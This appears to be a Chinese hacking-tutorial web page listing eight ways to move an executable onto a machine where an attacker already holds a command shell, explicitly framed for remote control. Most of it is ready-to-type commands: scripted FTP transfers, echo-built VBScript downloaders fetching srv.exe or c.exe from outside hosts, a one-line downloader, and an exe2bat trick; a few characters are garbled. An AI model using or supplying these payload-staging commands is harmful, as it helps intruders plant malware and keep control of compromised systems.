文件上传八大法-远程控制必看_漏洞研究教程-查字典教程网
文件上传八大法-远程控制必看
文件上传八大法-远程控制必看
发布时间:2016-12-26 来源:查字典编辑
摘要:本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.一,TFTP格式:tftp-igetfile.exepath/f...

本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.

一,TFTP

格式:tftp-igetfile.exepath/file.exe默认存放在system32下,如果指定就存在指定的地方。

二:ftp下载文件

ftp下载文件一般步骤如下:

echoopenxxx.xxx.xxx.xxx〉ftp.txt

echouser〉〉ftp.txt

echopassword〉〉ftp.txt

echobinary〉〉ftp.txt[可选]

echogetsrv.exe〉〉ftp.txt

echobye〉〉ftp.txt

ftp-s:ftp.txt(这一步是关键哟)

delftp.txt

这样srv.exe文件拖略谙吕戳恕1Vrv.exe已经存在指定位置。

四:写程序下载

脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:

echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉webdown.vbs

echoxPost.Open"GET","http://txhak.126.com/srv.exe",0〉〉webdown.vbs

echoxPost.Send()〉〉webdown.vbs

echoSetsGet=CreateObject("ADODB.Stream")〉〉webdown.vbs

echosGet.Mode=3〉〉webdown.vbs

echosGet.Type=1〉〉webdown.vbs

echosGet.Open()〉〉webdown.vbs

echosGet.Write(xPost.responseBody)〉〉webdown.vbs

echosGet.SaveToFile"srv.exe",2〉〉webdown.vbs

然后执行cscriptwebdown.vbs就可以啦。其中,http://txhak.126.com/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。

五:STARTITS:HTTP://IP/文件名

然后cd"C:DocumentsandSettingsDefaultUserLocalSettingsTemporaryInternetFilesContent.IE5"

然后DIR文件名[1]

注意:那串长文件名要用""引起来,因为有空格

例子:C:DocumentsandSettingsAdministrator〉startits:http://xxx.xxx.xxx.xxx/srv.

C:DocumentsandSettingsAdministratorLocalSettingsTemporaryInternetFilesContent.IE5AB3MNO1的目录

2003-11-2217:4812,832srv[1].exe

1个文件12,832字节

列出所有文件:

1个文件12,832字节

0个目录6,425,985,024可用字节

C:DocumentsandSettingsAdministrator〉copyC:DocumentsandSettingsAdministratorLocalSettingsTemporaryInternetFilesContent.IE5AB3MNO1srv[1].exec:srv.exe

已复制1个文件

六。一句话下载。第4种方法的精简,有时很有用的

echoSetxPost=CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():SetsGet=CreateObject(^"ADODB.Stream^"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile^"c:c.exe^",2〉pig.vbs

七。写程序下载

echoiLocal=LCase(WScript.Arguments(1))〉c:down.vbs

echoiRemote=LCase(WScript.Arguments(0))〉〉c:down.vbs

echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉〉c:down.vbs

echoxPost.Open"GET",iRemote,0〉〉c:down.vbs

echoxPost.Send()〉〉c:down.vbs

echoSetsGet=CreateObject("ADODB.Stream")〉〉c:down.vbs

echosGet.Mode=3〉〉c:down.vbs

echosGet.Type=1〉〉c:down.vbs

echosGet.Open()〉〉c:down.vbs

echosGet.Write(xPost.responseBody)〉〉c:down.vbs

echosGet.SaveToFileiLocal,2〉〉c:down.vbs

八.exe2bat命令行下输入,debug还原成文件

用exe2bat这个工具把exe文件转化成bat,然后一行行敲进去,这样工作量非常大,只适合于非常短小的文件。

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类